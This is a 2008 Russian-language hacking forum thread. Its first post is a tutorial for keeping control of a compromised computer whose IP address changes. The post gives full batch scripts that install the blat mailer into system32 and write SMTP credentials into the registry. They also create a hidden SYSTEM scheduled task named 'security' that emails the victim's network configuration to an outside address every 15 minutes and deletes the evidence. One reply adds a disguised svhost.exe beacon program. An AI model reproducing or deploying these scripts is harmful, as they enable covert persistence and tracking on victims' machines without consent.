ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Власть над компом с непостоянным Ip
  #1  
Старый 10.09.2008, 23:24
Аватар для Ru}{eeZ
Ru}{eeZ
Постоянный
Регистрация: 19.02.2008
Сообщений: 438
Провел на форуме:
956872

Репутация: 186
Отправить сообщение для Ru}{eeZ с помощью ICQ
По умолчанию Власть над компом с непостоянным Ip

Власть над компом с непостоянным IP

]INTRO[

Допустим вы хекнули кемп с непостоянным ип, власть над ним терять естественно не хочется, но вы не находите другого выхода кроме как довольствоваться данным сеансом (а затем от злости format c: ). Что ж... ну вот и один из выходов о котором говорит эта статья. Данный способ отсылает вам на постовый ящик ipconfig /all от жертвы, но сначала он прописывается в windows/system32, за тем в назначенных заданиях и выполняется через определённый интервал времени - тут вознивает вопрос: "Почумы бы не отправлять просто при каждом включении машины?"... ну я тоже так сначала подумал и написал всё с использованием служб, но я забыл, что при включении компа инет мало у кого параллельно запускается)).
В общем хватит рассказывать о том, о чём мы и так ниже прочитаем)).

]START[

Что нужно сделать для того, чтобы ipconfig /all отправлял свой отчёт на мыло? Ну для начала сохранить отчёт в файл, это:

ipconfig /all > info.txt

он сохранился в файл, за тем идёт команда (о ней ниже) и что-бы особо не светиться мы его удаляем:

DEL info.txt

Да, вот мы его создали, удалили, но вот пользы пока что мало... да и в назначенные задания добавлять батник создающий/удаляющий файл я тоже прикола не вижу))

Далее смотрим интересную тулзу по адресу http://blat.net , качаем full версию, распаковываем, кладём в общий каталог (где мы всё создаём), запускаем файл blat.exe через командную строку с параметрами:

-install -server smtp.yandex.ru -f antichat@yandex.ru -u antichat@yandex.ru -pw cool_pass

инсталим прогу так сказать
smtp.yandex.ru - smtp сервак
antichat@yandex.ru - мыло с которого производится отправка
antichat@yandex.ru - логин (для яндекса адрес ящика)
cool_pass - пароль к учётке

потом топаем смотреть реестр по адресу:
[HKEY_LOCAL_MACHINE\SOFTWARE\Public Domain\Blat]
Как видите, логин и пас шифруются, экспортируем эту ветку, нам это добро пригодится

ладно,теперь переходим к сборке самого пакета...

В нашем каталоге должны быть 5 файлов:
blat.dll
blat.lib
blat.exe
condition.bat
run.bat


Первые 3 файла блатовские, а вторые 2 создаём пустыми.

Заполняем run.bat:
chcp 1251
copy /y "%~dp0\blat.exe" "%SYSTEMROOT%/system32\blat.exe"
copy /y "%~dp0\blat.dll" "%SYSTEMROOT%/system32\blat.dll"
copy /y "%~dp0\blat.lib" "%SYSTEMROOT%/system32\blat.lib"
copy /y "%~dp0\condition.bat" "%SYSTEMROOT%/system32\condition.bat"
ECHO Windows Registry Editor Version 5.00> info.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Public Domain\Blat]>> info.reg
ECHO "SMTP server"="smtp.yandex.ru">> info.reg
ECHO "SMTP Port"="25">> info.reg
ECHO "Try"="1">> info.reg
ECHO "Login"="vebebbeb">> info.reg
ECHO "Pwd"="ebebbbbr">> info.reg
ECHO "Sender"="antichat@yandex.ru">> info.reg
regedit /s info.reg
DEL info.reg
schtasks /delete /tn "security" /f
schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32\condition.bat



chcp 1251 - кодировка
copy /y "%~dp0\blat.exe" "%SYSTEMROOT%/system32\blat.exe" - копируем blat.exe в system32
copy /y "%~dp0\blat.dll" "%SYSTEMROOT%/system32\blat.dll" - копируем blat.dll в system32
copy /y "%~dp0\blat.lib" "%SYSTEMROOT%/system32\blat.lib" - копируем blat.lib в system32
copy /y "%~dp0\condition.bat" "%SYSTEMROOT%/system32\condition.bat" - копируем condition.bat в system32
тут пригодилась наша экспортированная ветка:
echo - какбы показывает строку "> info.reg" перехватывает и записывает в info.reg (создавая его), ">> info.reg" дописывает в уже созданный.
ECHO Windows Registry Editor Version 5.00> info.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Public Domain\Blat]>> info.reg
ECHO "SMTP server"="smtp.yandex.ru">> info.reg
ECHO "SMTP Port"="25">> info.reg
ECHO "Try"="1">> info.reg
ECHO "Login"="vebebbeb">> info.reg
ECHO "Pwd"="ebebbbbr">> info.reg
ECHO "Sender"="antichat@yandex.ru">> info.reg
regedit /s info.reg - запускает свежевыжатый файл

DEL info.reg - удаляет файл за ненадобновтью
schtasks /delete /tn "security" /f - удаляет запланированное задание если такое имеется. Естественно 99% что его не будет, но это пригодится вам при проверке данной шняги, чтобы вручную не удалять.
schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32\condition.bat - создаёт запланированное задание, которое запускает файл condition.bat каждые 15 минут от иени системы.

Теперь сам condition.bat (очень много кода):
chcp 1251
ipconfig /all > info.txt
blat.exe info.txt -to admin@mail.ru -subject IPconfig
DEL info.txt


chcp 1251 - по привычке)
ipconfig /all > info.txt - ну вот создали

info.txt - берём файл
admin@mail.ru - отправляем админу mail.ru (можно изменить этот хтрожопый код, чтобы отправляло вам)
IPconfig - тема письма
blat.exe info.txt -to admin@mail.ru -subject IPconfig
DEL info.txt - удаляем файл

Ну вот вроди бы и всё, теперь запускаем run.bat

By Ru][eeZ (Йа)
Спасибо за помощь Remb0, SpangeBoB +[извиняюсь, если что-то забыл] (ставим им плюсы в репу!)

Последний раз редактировалось Ru}{eeZ; 10.09.2008 в 23:39..
 
Ответить с цитированием

  #2  
Старый 11.09.2008, 00:21
Аватар для Zitt
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

что за мания пошла на ачате писать статьи про батники....
 
Ответить с цитированием

  #3  
Старый 11.09.2008, 14:40
Аватар для Thanat0z
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

Ну да, много знаний не надо, всего 3 части для статьи:

1) что-то скопировать, создать
2) поиграться с ключами regedit
3) отосласть файл куда-то/приконектиться

Третья статья будет о том как через батник запустить винамп на компе жертвы?

А что такое непостоянный айпи? Это что-то типа "нетрадиционный"?

Последний раз редактировалось Thanat0z; 11.09.2008 в 18:34..
 
Ответить с цитированием

  #4  
Старый 11.09.2008, 19:12
Аватар для stopxaker
stopxaker
Постоянный
Регистрация: 06.09.2008
Сообщений: 459
Провел на форуме:
3687629

Репутация: 558
Отправить сообщение для stopxaker с помощью ICQ Отправить сообщение для stopxaker с помощью Yahoo
По умолчанию

Статья нормальная , специально для тех (для школьников) кто всё время в поиске кого нить хакнуть , пусть хоть что нибудь читают и может хоть что-нибудь у них будет откладываться в голове , если конечно они будут не просто копипастить , всё что он написал выше !
 
Ответить с цитированием

  #5  
Старый 11.09.2008, 19:26
Аватар для devton
devton
Участник форума
Регистрация: 26.10.2007
Сообщений: 283
Провел на форуме:
2605910

Репутация: 212
По умолчанию

название темы реально улыбнула
напомнило про мультик Пинки и Брэйн :
-Ru}{eeZ, а что мы будем делать сегодня вечером?
-Как всегда, мой друг. Попробуем захватить власть над компом с непостоянным айпи

а по теме: статья нормальная и имеет право на жиснь

Последний раз редактировалось devton; 11.09.2008 в 20:00..
 
Ответить с цитированием

  #6  
Старый 11.09.2008, 19:48
Аватар для diznt
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Самое классное это бекдор))) а так батники просто игрушка
 
Ответить с цитированием

  #7  
Старый 12.09.2008, 00:14
Аватар для Zitt
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

есть же тем а про батники.... не легче это все в одну обьеденить???

________________________
Шестисотый пост =\\\\
 
Ответить с цитированием

  #8  
Старый 12.09.2008, 11:24
Аватар для DarkMist
DarkMist
Участник форума
Регистрация: 20.02.2007
Сообщений: 173
Провел на форуме:
1487028

Репутация: 53
Отправить сообщение для DarkMist с помощью ICQ
По умолчанию

а я себе распечатал... думаю пригодится
Ru}{eeZ пиши никого не слушай!!
 
Ответить с цитированием

  #9  
Старый 12.09.2008, 14:01
Аватар для o_OBallers
o_OBallers
Banned
Регистрация: 11.10.2007
Сообщений: 54
Провел на форуме:
86268

Репутация: 84
По умолчанию

Статья, на самом деле хорошая,
но удивляет, почему, на этом форуме, больше статей про ПРОГРАММИРОВАНИЕ на батниках, а не других языках.

Может быть потому-что знающие люди вместо того чтобы писать статьи,
кусают программистов на батниках.

Цитаты
Власть над компом на батниках.
Лагерь солнышко рулит.
8А супер.

Последний раз редактировалось o_OBallers; 12.09.2008 в 14:03..
 
Ответить с цитированием

  #10  
Старый 06.01.2009, 00:45
Аватар для WALKMAN
WALKMAN
Познающий
Регистрация: 30.12.2007
Сообщений: 52
Провел на форуме:
375217

Репутация: 2
По умолчанию

Насчет того как узнавать непостоянный ИП, у меня была такая нужда и я поступил таким вариантом:
Создал мини сниффер на веб хостинге, ссылка, при обращении к которой записывался в тхт файл ип обративщейся машины. Затем написал на Delphi программу, которая запускалась без никаких признаков "жизни" (ее было только видно в процессах под именем: svhost.exe, оставалось только угадать какой именно ), ета программа переходила на сайт каждые N минут. Оставалось только добавить ее на автозапуск...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Власть над компом с непостоянным ип Ru}{eeZ Windows 7 09.09.2008 14:28
Mozilla работает над Firefox 4 Phm.phx Мировые новости 6 02.04.2008 01:08
1 апреля. Выкладываем шутки над друзьями NFM Болталка 31 01.04.2008 18:59
ООН собирается создать новый орган по контролю над интернетом dinar_007 Мировые новости 0 16.01.2006 02:21



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ